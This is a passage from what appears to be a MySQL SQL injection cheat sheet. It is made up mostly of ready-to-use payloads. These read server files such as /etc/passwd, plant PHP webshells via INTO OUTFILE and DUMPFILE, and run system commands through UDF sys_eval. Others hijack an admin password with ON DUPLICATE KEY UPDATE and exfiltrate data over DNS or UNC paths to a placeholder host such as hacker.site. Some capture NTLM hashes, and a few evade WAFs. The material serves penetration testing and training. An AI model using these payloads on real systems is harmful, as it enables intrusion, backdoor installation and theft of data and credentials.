<p><code>INFORMATION_SCHEMA.PROCESSLIST</code> is a special table available in MySQL and MariaDB that provides information about the active processes and threads within the database server. It lists the operations the database is performing at that moment. Note that without the <code>PROCESS</code> privilege, only the threads belonging to the current account are visible.</p>
<p>The <code>PROCESSLIST</code> table contains several important columns, each providing details about the current processes. Common columns include: </p>
<ul>
<li><strong>ID</strong> : The process identifier.</li>
<li><strong>USER</strong> : The MySQL user who is running the process.</li>
<li><strong>HOST</strong> : The host from which the process was initiated.</li>
<li><strong>DB</strong> : The database the process is currently accessing, if any.</li>
<li><strong>COMMAND</strong> : The type of command the process is executing (e.g., Query, Sleep).</li>
<li><strong>TIME</strong> : The time in seconds that the process has been running.</li>
<li><strong>STATE</strong> : The current state of the process.</li>
<li><strong>INFO</strong> : The text of the statement being executed, or NULL if no statement is being executed.</li>
</ul>
<div class="highlight"><pre><span></span><code><a id="__codelineno-36-1" name="__codelineno-36-1" href="#__codelineno-36-1"></a><span class="k">SELECT</span><span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="k">FROM</span><span class="w"> </span><span class="n">INFORMATION_SCHEMA</span><span class="p">.</span><span class="n">PROCESSLIST</span><span class="p">;</span>
</code></pre></div>
<table>
<thead>
<tr>
<th>ID</th>
<th>USER</th>
<th>HOST</th>
<th>DB</th>
<th>COMMAND</th>
<th>TIME</th>
<th>STATE</th>
<th>INFO</th>
</tr>
</thead>
<tbody>
<tr>
<td>1</td>
<td>root</td>
<td>localhost</td>
<td>testdb</td>
<td>Query</td>
<td>10</td>
<td>executing</td>
<td>SELECT * FROM some_table</td>
</tr>
<tr>
<td>2</td>
<td>app_user</td>
<td>192.168.0.101</td>
<td>appdb</td>
<td>Sleep</td>
<td>300</td>
<td>sleeping</td>
<td>NULL</td>
</tr>
<tr>
<td>3</td>
<td>guest_user</td>
<td>example.com:3360</td>
<td>NULL</td>
<td>Connect</td>
<td>0</td>
<td>connecting</td>
<td>NULL</td>
</tr>
</tbody>
</table>
<div class="highlight"><pre><span></span><code><a id="__codelineno-37-1" name="__codelineno-37-1" href="#__codelineno-37-1"></a><span class="k">UNION</span><span class="w"> </span><span class="k">SELECT</span><span class="w"> </span><span class="mi">1</span><span class="p">,</span><span class="k">state</span><span class="p">,</span><span class="n">info</span><span class="p">,</span><span class="mi">4</span><span class="w"> </span><span class="k">FROM</span><span class="w"> </span><span class="n">INFORMATION_SCHEMA</span><span class="p">.</span><span class="n">PROCESSLIST</span><span class="w"> </span><span class="o">#</span>
</code></pre></div>
<p>Dump-in-one-shot query to extract the whole content of the table:</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-38-1" name="__codelineno-38-1" href="#__codelineno-38-1"></a><span class="k">UNION</span><span class="w"> </span><span class="k">SELECT</span><span class="w"> </span><span class="mi">1</span><span class="p">,(</span><span class="k">SELECT</span><span class="p">(</span><span class="o">@</span><span class="p">)</span><span class="k">FROM</span><span class="p">(</span><span class="k">SELECT</span><span class="p">(</span><span class="o">@</span><span class="p">:</span><span class="o">=</span><span class="mi">0</span><span class="n">X00</span><span class="p">),(</span><span class="k">SELECT</span><span class="p">(</span><span class="o">@</span><span class="p">)</span><span class="k">FROM</span><span class="p">(</span><span class="n">information_schema</span><span class="p">.</span><span class="n">processlist</span><span class="p">)</span><span class="k">WHERE</span><span class="p">(</span><span class="o">@</span><span class="p">)</span><span class="k">IN</span><span class="p">(</span><span class="o">@</span><span class="p">:</span><span class="o">=</span><span class="n">CONCAT</span><span class="p">(</span><span class="o">@</span><span class="p">,</span><span class="mi">0</span><span class="n">x3C62723E</span><span class="p">,</span><span class="k">state</span><span class="p">,</span><span class="mi">0</span><span class="n">x3a</span><span class="p">,</span><span class="n">info</span><span class="p">))))</span><span class="n">a</span><span class="p">),</span><span class="mi">3</span><span class="p">,</span><span class="mi">4</span><span class="w"> </span><span class="o">#</span>
</code></pre></div>
<h2 id="mysql-read-content-of-a-file">MYSQL Read Content of a File</h2>
<p>Requires the <code>FILE</code> privilege (<code>file_priv</code>). Note that the error below is raised by the <code>--secure-file-priv</code> server option, which restricts the directories the server may read from or write to regardless of the account's privileges : <code>ERROR 1290 (HY000): The MySQL server is running with the --secure-file-priv option so it cannot execute this statement</code></p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-39-1" name="__codelineno-39-1" href="#__codelineno-39-1"></a><span class="k">UNION</span><span class="w"> </span><span class="k">ALL</span><span class="w"> </span><span class="k">SELECT</span><span class="w"> </span><span class="n">LOAD_FILE</span><span class="p">(</span><span class="s1">&#39;/etc/passwd&#39;</span><span class="p">)</span><span class="w"> </span><span class="c1">--</span>
<a id="__codelineno-39-2" name="__codelineno-39-2" href="#__codelineno-39-2"></a><span class="k">UNION</span><span class="w"> </span><span class="k">ALL</span><span class="w"> </span><span class="k">SELECT</span><span class="w"> </span><span class="n">TO_base64</span><span class="p">(</span><span class="n">LOAD_FILE</span><span class="p">(</span><span class="s1">&#39;/var/www/html/index.php&#39;</span><span class="p">));</span>
</code></pre></div>
<p>If you are <code>root</code> on the database, you can grant the <code>FILE</code> privilege (re-enabling <code>LOAD_FILE</code>) with the following query:</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-40-1" name="__codelineno-40-1" href="#__codelineno-40-1"></a><span class="k">GRANT</span><span class="w"> </span><span class="n">FILE</span><span class="w"> </span><span class="k">ON</span><span class="w"> </span><span class="o">*</span><span class="p">.</span><span class="o">*</span><span class="w"> </span><span class="k">TO</span><span class="w"> </span><span class="s1">&#39;root&#39;</span><span class="o">@</span><span class="s1">&#39;localhost&#39;</span><span class="p">;</span><span class="w"> </span><span class="n">FLUSH</span><span class="w"> </span><span class="k">PRIVILEGES</span><span class="p">;</span><span class="o">#</span>
</code></pre></div>
<h2 id="mysql-command-execution">MYSQL Command Execution</h2>
<h3 id="webshell-outfile-method">WEBSHELL - OUTFILE Method</h3>
<div class="highlight"><pre><span></span><code><a id="__codelineno-41-1" name="__codelineno-41-1" href="#__codelineno-41-1"></a><span class="p">[...]</span><span class="w"> </span><span class="k">UNION</span><span class="w"> </span><span class="k">SELECT</span><span class="w"> </span><span class="ss">&quot;&lt;?php system($_GET[&#39;cmd&#39;]); ?&gt;&quot;</span><span class="w"> </span><span class="k">into</span><span class="w"> </span><span class="n">outfile</span><span class="w"> </span><span class="ss">&quot;C:\\xampp\\htdocs\\backdoor.php&quot;</span>
<a id="__codelineno-41-2" name="__codelineno-41-2" href="#__codelineno-41-2"></a><span class="p">[...]</span><span class="w"> </span><span class="k">UNION</span><span class="w"> </span><span class="k">SELECT</span><span class="w"> </span><span class="s1">&#39;&#39;</span><span class="w"> </span><span class="k">INTO</span><span class="w"> </span><span class="n">OUTFILE</span><span class="w"> </span><span class="s1">&#39;/var/www/html/x.php&#39;</span><span class="w"> </span><span class="n">FIELDS</span><span class="w"> </span><span class="n">TERMINATED</span><span class="w"> </span><span class="k">BY</span><span class="w"> </span><span class="s1">&#39;&lt;?php phpinfo();?&gt;&#39;</span>
<a id="__codelineno-41-3" name="__codelineno-41-3" href="#__codelineno-41-3"></a><span class="p">[...]</span><span class="w"> </span><span class="k">UNION</span><span class="w"> </span><span class="k">SELECT</span><span class="w"> </span><span class="mi">1</span><span class="p">,</span><span class="mi">2</span><span class="p">,</span><span class="mi">3</span><span class="p">,</span><span class="mi">4</span><span class="p">,</span><span class="mi">5</span><span class="p">,</span><span class="mi">0</span><span class="n">x3c3f70687020706870696e666f28293b203f3e</span><span class="w"> </span><span class="k">into</span><span class="w"> </span><span class="n">outfile</span><span class="w"> </span><span class="s1">&#39;C:\\wamp\\www\\pwnd.php&#39;</span><span class="c1">-- -</span>
<a id="__codelineno-41-4" name="__codelineno-41-4" href="#__codelineno-41-4"></a><span class="p">[...]</span><span class="w"> </span><span class="k">union</span><span class="w"> </span><span class="k">all</span><span class="w"> </span><span class="k">select</span><span class="w"> </span><span class="mi">1</span><span class="p">,</span><span class="mi">2</span><span class="p">,</span><span class="mi">3</span><span class="p">,</span><span class="mi">4</span><span class="p">,</span><span class="ss">&quot;&lt;?php echo shell_exec($_GET[&#39;cmd&#39;]);?&gt;&quot;</span><span class="p">,</span><span class="mi">6</span><span class="w"> </span><span class="k">into</span><span class="w"> </span><span class="n">OUTFILE</span><span class="w"> </span><span class="s1">&#39;c:/inetpub/wwwroot/backdoor.php&#39;</span>
</code></pre></div>
<h3 id="webshell-dumpfile-method">WEBSHELL - DUMPFILE Method</h3>
<div class="highlight"><pre><span></span><code><a id="__codelineno-42-1" name="__codelineno-42-1" href="#__codelineno-42-1"></a><span class="p">[...]</span><span class="w"> </span><span class="k">UNION</span><span class="w"> </span><span class="k">SELECT</span><span class="w"> </span><span class="mi">0</span><span class="n">xPHP_PAYLOAD_IN_HEX</span><span class="p">,</span><span class="w"> </span><span class="k">NULL</span><span class="p">,</span><span class="w"> </span><span class="k">NULL</span><span class="w"> </span><span class="k">INTO</span><span class="w"> </span><span class="n">DUMPFILE</span><span class="w"> </span><span class="s1">&#39;C:/Program Files/EasyPHP-12.1/www/shell.php&#39;</span>
<a id="__codelineno-42-2" name="__codelineno-42-2" href="#__codelineno-42-2"></a><span class="p">[...]</span><span class="w"> </span><span class="k">UNION</span><span class="w"> </span><span class="k">SELECT</span><span class="w"> </span><span class="mi">0</span><span class="n">x3c3f7068702073797374656d28245f4745545b2763275d293b203f3e</span><span class="w"> </span><span class="k">INTO</span><span class="w"> </span><span class="n">DUMPFILE</span><span class="w"> </span><span class="s1">&#39;/var/www/html/images/shell.php&#39;</span><span class="p">;</span>
</code></pre></div>
<h3 id="command-udf-library">COMMAND - UDF Library</h3>
<p>First, check whether the UDF library is installed on the server.</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-43-1" name="__codelineno-43-1" href="#__codelineno-43-1"></a><span class="p">$</span> <span class="n">whereis</span> <span class="n">lib_mysqludf_sys</span><span class="p">.</span><span class="n">so</span>
<a id="__codelineno-43-2" name="__codelineno-43-2" href="#__codelineno-43-2"></a><span class="p">/</span><span class="n">usr</span><span class="p">/</span><span class="n">lib</span><span class="p">/</span><span class="n">lib_mysqludf_sys</span><span class="p">.</span><span class="n">so</span>
</code></pre></div>
<p>Then you can use functions such as <code>sys_exec</code> and <code>sys_eval</code>.</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-44-1" name="__codelineno-44-1" href="#__codelineno-44-1"></a><span class="err">$</span><span class="w"> </span><span class="n">mysql</span><span class="w"> </span><span class="o">-</span><span class="n">u</span><span class="w"> </span><span class="n">root</span><span class="w"> </span><span class="o">-</span><span class="n">p</span><span class="w"> </span><span class="n">mysql</span>
<a id="__codelineno-44-2" name="__codelineno-44-2" href="#__codelineno-44-2"></a><span class="n">Enter</span><span class="w"> </span><span class="n">password</span><span class="p">:</span><span class="w"> </span><span class="p">[...]</span>
<a id="__codelineno-44-3" name="__codelineno-44-3" href="#__codelineno-44-3"></a>
<a id="__codelineno-44-4" name="__codelineno-44-4" href="#__codelineno-44-4"></a><span class="n">mysql</span><span class="o">&gt;</span><span class="w"> </span><span class="k">SELECT</span><span class="w"> </span><span class="n">sys_eval</span><span class="p">(</span><span class="s1">&#39;id&#39;</span><span class="p">);</span>
<a id="__codelineno-44-5" name="__codelineno-44-5" href="#__codelineno-44-5"></a><span class="o">+</span><span class="c1">--------------------------------------------------+</span>
<a id="__codelineno-44-6" name="__codelineno-44-6" href="#__codelineno-44-6"></a><span class="o">|</span><span class="w"> </span><span class="n">sys_eval</span><span class="p">(</span><span class="s1">&#39;id&#39;</span><span class="p">)</span><span class="w"> </span><span class="o">|</span>
<a id="__codelineno-44-7" name="__codelineno-44-7" href="#__codelineno-44-7"></a><span class="o">+</span><span class="c1">--------------------------------------------------+</span>
<a id="__codelineno-44-8" name="__codelineno-44-8" href="#__codelineno-44-8"></a><span class="o">|</span><span class="w"> </span><span class="n">uid</span><span class="o">=</span><span class="mi">118</span><span class="p">(</span><span class="n">mysql</span><span class="p">)</span><span class="w"> </span><span class="n">gid</span><span class="o">=</span><span class="mi">128</span><span class="p">(</span><span class="n">mysql</span><span class="p">)</span><span class="w"> </span><span class="n">groups</span><span class="o">=</span><span class="mi">128</span><span class="p">(</span><span class="n">mysql</span><span class="p">)</span><span class="w"> </span><span class="o">|</span>
<a id="__codelineno-44-9" name="__codelineno-44-9" href="#__codelineno-44-9"></a><span class="o">+</span><span class="c1">--------------------------------------------------+</span>
</code></pre></div>
<h2 id="mysql-insert">MYSQL INSERT</h2>
<p>The <code>ON DUPLICATE KEY UPDATE</code> clause tells MySQL what to do when the application tries to insert a row that already exists in the table. We can use this to change the admin password:</p>
<p>Inject using payload:</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-45-1" name="__codelineno-45-1" href="#__codelineno-45-1"></a><span class="n">attacker_dummy</span><span class="o">@</span><span class="n">example</span><span class="p">.</span><span class="n">com</span><span class="ss">&quot;, &quot;</span><span class="n">P</span><span class="o">@</span><span class="n">ssw0rd</span><span class="ss">&quot;), (&quot;</span><span class="k">admin</span><span class="o">@</span><span class="n">example</span><span class="p">.</span><span class="n">com</span><span class="ss">&quot;, &quot;</span><span class="n">P</span><span class="o">@</span><span class="n">ssw0rd</span><span class="ss">&quot;) ON DUPLICATE KEY UPDATE password=&quot;</span><span class="n">P</span><span class="o">@</span><span class="n">ssw0rd</span><span class="err">&quot;</span><span class="w"> </span><span class="c1">--</span>
</code></pre></div>
<p>The query would look like this:</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-46-1" name="__codelineno-46-1" href="#__codelineno-46-1"></a><span class="k">INSERT</span><span class="w"> </span><span class="k">INTO</span><span class="w"> </span><span class="n">users</span><span class="w"> </span><span class="p">(</span><span class="n">email</span><span class="p">,</span><span class="w"> </span><span class="n">password</span><span class="p">)</span><span class="w"> </span><span class="k">VALUES</span><span class="w"> </span><span class="p">(</span><span class="ss">&quot;attacker_dummy@example.com&quot;</span><span class="p">,</span><span class="w"> </span><span class="ss">&quot;BCRYPT_HASH&quot;</span><span class="p">),</span><span class="w"> </span><span class="p">(</span><span class="ss">&quot;admin@example.com&quot;</span><span class="p">,</span><span class="w"> </span><span class="ss">&quot;P@ssw0rd&quot;</span><span class="p">)</span><span class="w"> </span><span class="k">ON</span><span class="w"> </span><span class="n">DUPLICATE</span><span class="w"> </span><span class="k">KEY</span><span class="w"> </span><span class="k">UPDATE</span><span class="w"> </span><span class="n">password</span><span class="o">=</span><span class="ss">&quot;P@ssw0rd&quot;</span><span class="w"> </span><span class="c1">-- &quot;, &quot;BCRYPT_HASH_OF_YOUR_PASSWORD_INPUT&quot;);</span>
</code></pre></div>
<p>This query will insert a row for the user "attacker_dummy@example.com". It will also insert a row for the user "admin@example.com".</p>
<p>Because this row already exists, the <code>ON DUPLICATE KEY UPDATE</code> keyword tells MySQL to update the <code>password</code> column of the already existing row to "P@ssw0rd". After this, we can simply authenticate with "admin@example.com" and the password "P@ssw0rd".</p>
<h2 id="mysql-truncation">MYSQL Truncation</h2>
<p>In MySQL, "<code>admin</code>" and "<code>admin </code>" (with trailing spaces) compare as the same value. If the username column in the database has a character limit, the remaining characters are truncated on insert: with a column limit of 20 characters and an input of 21 characters, the last character is removed. Truncation only happens when strict SQL mode is disabled; in strict mode the over-long insert is rejected instead.</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-47-1" name="__codelineno-47-1" href="#__codelineno-47-1"></a><span class="o">`</span><span class="n">username</span><span class="o">`</span><span class="w"> </span><span class="nb">varchar</span><span class="p">(</span><span class="mi">20</span><span class="p">)</span><span class="w"> </span><span class="k">not</span><span class="w"> </span><span class="k">null</span>
</code></pre></div>
<p>Payload: <code>username = "admin" + 15 spaces + "a"</code> (21 characters in total). The application's uniqueness check sees a value that differs from <code>admin</code>, but the stored, truncated value is <code>admin</code> followed by trailing spaces, which a <code>PAD SPACE</code> collation treats as <code>admin</code>.</p>
<h2 id="mysql-out-of-band">MYSQL Out of Band</h2>
<p>Writing to a UNC path requires the <code>FILE</code> privilege, a <code>secure_file_priv</code> setting that does not restrict the target location, and a MySQL server running on Windows (UNC paths are resolved by the Windows SMB client, not by MySQL). Replace <code>192.168.0.100</code> with a host you control.</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-48-1" name="__codelineno-48-1" href="#__codelineno-48-1"></a><span class="nb">SELECT </span><span class="nv">@@version</span> <span class="n">INTO</span> <span class="n">OUTFILE</span> <span class="s1">&#39;\\\\192.168.0.100\\temp\\out.txt&#39;</span><span class="p">;</span>
<a id="__codelineno-48-2" name="__codelineno-48-2" href="#__codelineno-48-2"></a><span class="nb">SELECT </span><span class="nv">@@version</span> <span class="n">INTO</span> <span class="n">DUMPFILE</span> <span class="s1">&#39;\\\\192.168.0.100\\temp\\out.txt&#39;</span><span class="p">;</span>
</code></pre></div>
<h3 id="dns-exfiltration">DNS Exfiltration</h3>
<p><code>hacker.site</code> is a placeholder for a domain whose authoritative DNS server you control; the value of <code>VERSION()</code> arrives as a subdomain label in that server's query log. The lookup is performed by the Windows host while resolving the UNC hostname, before any SMB connection is attempted, so it can succeed even where outbound SMB is blocked.</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-49-1" name="__codelineno-49-1" href="#__codelineno-49-1"></a><span class="k">SELECT</span><span class="w"> </span><span class="n">LOAD_FILE</span><span class="p">(</span><span class="n">CONCAT</span><span class="p">(</span><span class="s1">&#39;\\\\&#39;</span><span class="p">,</span><span class="k">VERSION</span><span class="p">(),</span><span class="s1">&#39;.hacker.site\\a.txt&#39;</span><span class="p">));</span>
<a id="__codelineno-49-2" name="__codelineno-49-2" href="#__codelineno-49-2"></a><span class="k">SELECT</span><span class="w"> </span><span class="n">LOAD_FILE</span><span class="p">(</span><span class="n">CONCAT</span><span class="p">(</span><span class="mi">0</span><span class="n">x5c5c5c5c</span><span class="p">,</span><span class="k">VERSION</span><span class="p">(),</span><span class="mi">0</span><span class="n">x2e6861636b65722e736974655c5c612e747874</span><span class="p">))</span>
</code></pre></div>
<h3 id="unc-path-ntlm-hash-stealing">UNC Path - NTLM Hash Stealing</h3>
<p>The term "UNC path" refers to the Universal Naming Convention path used to specify the location of resources such as shared files or devices on a network. It is commonly used in Windows environments to access files over a network using a format like <code>\\server\share\file</code>. In the payloads below, <code>error</code> stands for a host you control running an SMB listener (e.g. a Responder-style capture tool); when the Windows-hosted MySQL server tries to open the share, it authenticates with the service account's credentials, and the Net-NTLM response can be captured and relayed or cracked offline.</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-50-1" name="__codelineno-50-1" href="#__codelineno-50-1"></a><span class="k">SELECT</span><span class="w"> </span><span class="n">LOAD_FILE</span><span class="p">(</span><span class="s1">&#39;\\\\error\\abc&#39;</span><span class="p">);</span>
<a id="__codelineno-50-2" name="__codelineno-50-2" href="#__codelineno-50-2"></a><span class="k">SELECT</span><span class="w"> </span><span class="n">LOAD_FILE</span><span class="p">(</span><span class="mi">0</span><span class="n">x5c5c5c5c6572726f725c5c616263</span><span class="p">);</span>
<a id="__codelineno-50-3" name="__codelineno-50-3" href="#__codelineno-50-3"></a><span class="k">SELECT</span><span class="w"> </span><span class="s1">&#39;&#39;</span><span class="w"> </span><span class="k">INTO</span><span class="w"> </span><span class="n">DUMPFILE</span><span class="w"> </span><span class="s1">&#39;\\\\error\\abc&#39;</span><span class="p">;</span>
<a id="__codelineno-50-4" name="__codelineno-50-4" href="#__codelineno-50-4"></a><span class="k">SELECT</span><span class="w"> </span><span class="s1">&#39;&#39;</span><span class="w"> </span><span class="k">INTO</span><span class="w"> </span><span class="n">OUTFILE</span><span class="w"> </span><span class="s1">&#39;\\\\error\\abc&#39;</span><span class="p">;</span>
<a id="__codelineno-50-5" name="__codelineno-50-5" href="#__codelineno-50-5"></a><span class="k">LOAD</span><span class="w"> </span><span class="k">DATA</span><span class="w"> </span><span class="n">INFILE</span><span class="w"> </span><span class="s1">&#39;\\\\error\\abc&#39;</span><span class="w"> </span><span class="k">INTO</span><span class="w"> </span><span class="k">TABLE</span><span class="w"> </span><span class="k">DATABASE</span><span class="p">.</span><span class="k">TABLE_NAME</span><span class="p">;</span>
</code></pre></div>
<p><img alt="⚠" class="twemoji" src="https://cdn.jsdelivr.net/gh/jdecked/twemoji@15.1.0/assets/svg/26a0.svg" title=":warning:" /> Don't forget to escape the '\\'.</p>
<h2 id="mysql-waf-bypass">MYSQL WAF Bypass</h2>
<h3 id="alternative-to-information-schema">Alternative to Information Schema</h3>
<p><code>information_schema.tables</code> alternative. Caveats: reading <code>mysql.innodb_table_stats</code> requires privileges on the <code>mysql</code> schema, it only lists InnoDB tables, and <code>SHOW TABLES</code> cannot be embedded in a subquery, so it is only usable where the injection allows a full statement.</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-51-1" name="__codelineno-51-1" href="#__codelineno-51-1"></a><span class="k">SELECT</span><span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="k">FROM</span><span class="w"> </span><span class="n">mysql</span><span class="p">.</span><span class="n">innodb_table_stats</span><span class="p">;</span>
<a id="__codelineno-51-2" name="__codelineno-51-2" href="#__codelineno-51-2"></a><span class="o">+</span><span class="c1">----------------+-----------------------+---------------------+--------+----------------------+--------------------------+</span>
<a id="__codelineno-51-3" name="__codelineno-51-3" href="#__codelineno-51-3"></a><span class="o">|</span><span class="w"> </span><span class="n">database_name</span><span class="w"> </span><span class="o">|</span><span class="w"> </span><span class="k">table_name</span><span class="w"> </span><span class="o">|</span><span class="w"> </span><span class="n">last_update</span><span class="w"> </span><span class="o">|</span><span class="w"> </span><span class="n">n_rows</span><span class="w"> </span><span class="o">|</span><span class="w"> </span><span class="n">clustered_index_size</span><span class="w"> </span><span class="o">|</span><span class="w"> </span><span class="n">sum_of_other_index_sizes</span><span class="w"> </span><span class="o">|</span>
<a id="__codelineno-51-4" name="__codelineno-51-4" href="#__codelineno-51-4"></a><span class="o">+</span><span class="c1">----------------+-----------------------+---------------------+--------+----------------------+--------------------------+</span>
<a id="__codelineno-51-5" name="__codelineno-51-5" href="#__codelineno-51-5"></a><span class="o">|</span><span class="w"> </span><span class="n">dvwa</span><span class="w"> </span><span class="o">|</span><span class="w"> </span><span class="n">guestbook</span><span class="w"> </span><span class="o">|</span><span class="w"> </span><span class="mi">2017</span><span class="o">-</span><span class="mi">01</span><span class="o">-</span><span class="mi">19</span><span class="w"> </span><span class="mi">21</span><span class="p">:</span><span class="mi">02</span><span class="p">:</span><span class="mi">57</span><span class="w"> </span><span class="o">|</span><span class="w"> </span><span class="mi">0</span><span class="w"> </span><span class="o">|</span><span class="w"> </span><span class="mi">1</span><span class="w"> </span><span class="o">|</span><span class="w"> </span><span class="mi">0</span><span class="w"> </span><span class="o">|</span>
<a id="__codelineno-51-6" name="__codelineno-51-6" href="#__codelineno-51-6"></a><span class="o">|</span><span class="w"> </span><span class="n">dvwa</span><span class="w"> </span><span class="o">|</span><span class="w"> </span><span class="n">users</span><span class="w"> </span><span class="o">|</span><span class="w"> </span><span class="mi">2017</span><span class="o">-</span><span class="mi">01</span><span class="o">-</span><span class="mi">19</span><span class="w"> </span><span class="mi">21</span><span class="p">:</span><span class="mi">03</span><span class="p">:</span><span class="mi">07</span><span class="w"> </span><span class="o">|</span><span class="w"> </span><span class="mi">5</span><span class="w"> </span><span class="o">|</span><span class="w"> </span><span class="mi">1</span><span class="w"> </span><span class="o">|</span><span class="w"> </span><span class="mi">0</span><span class="w"> </span><span class="o">|</span>
<a id="__codelineno-51-7" name="__codelineno-51-7" href="#__codelineno-51-7"></a><span class="p">...</span>
<a id="__codelineno-51-8" name="__codelineno-51-8" href="#__codelineno-51-8"></a><span class="o">+</span><span class="c1">----------------+-----------------------+---------------------+--------+----------------------+--------------------------+</span>
<a id="__codelineno-51-9" name="__codelineno-51-9" href="#__codelineno-51-9"></a>
<a id="__codelineno-51-10" name="__codelineno-51-10" href="#__codelineno-51-10"></a><span class="n">mysql</span><span class="o">&gt;</span><span class="w"> </span><span class="k">SHOW</span><span class="w"> </span><span class="n">TABLES</span><span class="w"> </span><span class="k">IN</span><span class="w"> </span><span class="n">dvwa</span><span class="p">;</span>
<a id="__codelineno-51-11" name="__codelineno-51-11" href="#__codelineno-51-11"></a><span class="o">+</span><span class="c1">----------------+</span>
<a id="__codelineno-51-12" name="__codelineno-51-12" href="#__codelineno-51-12"></a><span class="o">|</span><span class="w"> </span><span class="n">Tables_in_dvwa</span><span class="w"> </span><span class="o">|</span>
<a id="__codelineno-51-13" name="__codelineno-51-13" href="#__codelineno-51-13"></a><span class="o">+</span><span class="c1">----------------+</span>
<a id="__codelineno-51-14" name="__codelineno-51-14" href="#__codelineno-51-14"></a><span class="o">|</span><span class="w"> </span><span class="n">guestbook</span><span class="w"> </span><span class="o">|</span>
<a id="__codelineno-51-15" name="__codelineno-51-15" href="#__codelineno-51-15"></a><span class="o">|</span><span class="w"> </span><span class="n">users</span><span class="w"> </span><span class="o">|</span>
<a id="__codelineno-51-16" name="__codelineno-51-16" href="#__codelineno-51-16"></a><span class="o">+</span><span class="c1">----------------+</span>
</code></pre></div>
<h3 id="alternative-to-version">Alternative to VERSION</h3>
<div class="highlight"><pre><span></span><code><a id="__codelineno-52-1" name="__codelineno-52-1" href="#__codelineno-52-1"></a><span class="n">mysql</span><span class="o">&gt;</span><span class="w"> </span><span class="k">SELECT</span><span class="w"> </span><span class="o">@@</span><span class="n">innodb_version</span><span class="p">;</span>
<a id="__codelineno-52-2" name="__codelineno-52-2" href="#__codelineno-52-2"></a><span class="o">+</span><span class="c1">------------------+</span>
<a id="__codelineno-52-3" name="__codelineno-52-3" href="#__codelineno-52-3"></a><span class="o">|</span><span class="w"> </span><span class="o">@@</span><span class="n">innodb_version</span><span class="w"> </span><span class="o">|</span>
<a id="__codelineno-52-4" name="__codelineno-52-4" href="#__codelineno-52-4"></a><span class="o">+</span><span class="c1">------------------+</span>
<a id="__codelineno-52-5" name="__codelineno-52-5" href="#__codelineno-52-5"></a><span class="o">|</span><span class="w"> </span><span class="mi">5</span><span class="p">.</span><span class="mi">6</span><span class="p">.</span><span class="mi">31</span><span class="w"> </span><span class="o">|</span>
<a id="__codelineno-52-6" name="__codelineno-52-6" href="#__codelineno-52-6"></a><span class="o">+</span><span class="c1">------------------+</span>
<a id="__codelineno-52-7" name="__codelineno-52-7" href="#__codelineno-52-7"></a>
<a id="__codelineno-52-8" name="__codelineno-52-8" href="#__codelineno-52-8"></a><span class="n">mysql</span><span class="o">&gt;</span><span class="w"> </span><span class="k">SELECT</span><span class="w"> </span><span class="o">@@</span><span class="k">version</span><span class="p">;</span>
<a id="__codelineno-52-9" name="__codelineno-52-9" href="#__codelineno-52-9"></a><span class="o">+</span><span class="c1">-------------------------+</span>
<a id="__codelineno-52-10" name="__codelineno-52-10" href="#__codelineno-52-10"></a><span class="o">|</span><span class="w"> </span><span class="o">@@</span><span class="k">version</span><span class="w"> </span><span class="o">|</span>
<a id="__codelineno-52-11" name="__codelineno-52-11" href="#__codelineno-52-11"></a><span class="o">+</span><span class="c1">-------------------------+</span>
<a id="__codelineno-52-12" name="__codelineno-52-12" href="#__codelineno-52-12"></a><span class="o">|</span><span class="w"> </span><span class="mi">5</span><span class="p">.</span><span class="mi">6</span><span class="p">.</span><span class="mi">31</span><span class="o">-</span><span class="mi">0</span><span class="n">ubuntu0</span><span class="p">.</span><span class="mi">15</span><span class="p">.</span><span class="mi">10</span><span class="p">.</span><span class="mi">1</span><span class="w"> </span><span class="o">|</span>
<a id="__codelineno-52-13" name="__codelineno-52-13" href="#__codelineno-52-13"></a><span class="o">+</span><span class="c1">-------------------------+</span>
<a id="__codelineno-52-14" name="__codelineno-52-14" href="#__codelineno-52-14"></a>
<a id="__codelineno-52-15" name="__codelineno-52-15" href="#__codelineno-52-15"></a><span class="n">mysql</span><span class="o">&gt;</span><span class="w"> </span><span class="k">SELECT</span><span class="w"> </span><span class="k">version</span><span class="p">();</span>
<a id="__codelineno-52-16" name="__codelineno-52-16" href="#__codelineno-52-16"></a><span class="o">+</span><span class="c1">-------------------------+</span>
<a id="__codelineno-52-17" name="__codelineno-52-17" href="#__codelineno-52-17"></a><span class="o">|</span><span class="w"> </span><span class="k">version</span><span class="p">()</span><span class="w"> </span><span class="o">|</span>
<a id="__codelineno-52-18" name="__codelineno-52-18" href="#__codelineno-52-18"></a><span class="o">+</span><span class="c1">-------------------------+</span>
<a id="__codelineno-52-19" name="__codelineno-52-19" href="#__codelineno-52-19"></a><span class="o">|</span><span class="w"> </span><span class="mi">5</span><span class="p">.</span><span class="mi">6</span><span class="p">.</span><span class="mi">31</span><span class="o">-</span><span class="mi">0</span><span class="n">ubuntu0</span><span class="p">.</span><span class="mi">15</span><span class="p">.</span><span class="mi">10</span><span class="p">.</span><span class="mi">1</span><span class="w"> </span><span class="o">|</span>
<a id="__codelineno-52-20" name="__codelineno-52-20" href="#__codelineno-52-20"></a><span class="o">+</span><span class="c1">-------------------------+</span>
<a id="__codelineno-52-21" name="__codelineno-52-21" href="#__codelineno-52-21"></a>
<a id="__codelineno-52-22" name="__codelineno-52-22" href="#__codelineno-52-22"></a><span class="n">mysql</span><span class="o">&gt;</span><span class="w"> </span><span class="k">SELECT</span><span class="w"> </span><span class="o">@@</span><span class="k">GLOBAL</span><span class="p">.</span><span class="k">VERSION</span><span class="p">;</span>
<a id="__codelineno-52-23" name="__codelineno-52-23" href="#__codelineno-52-23"></a><span class="o">+</span><span class="c1">------------------+</span>
<a id="__codelineno-52-24" name="__codelineno-52-24" href="#__codelineno-52-24"></a><span class="o">|</span><span class="w"> </span><span class="o">@@</span><span class="k">GLOBAL</span><span class="p">.</span><span class="k">VERSION</span><span class="w"> </span><span class="o">|</span>
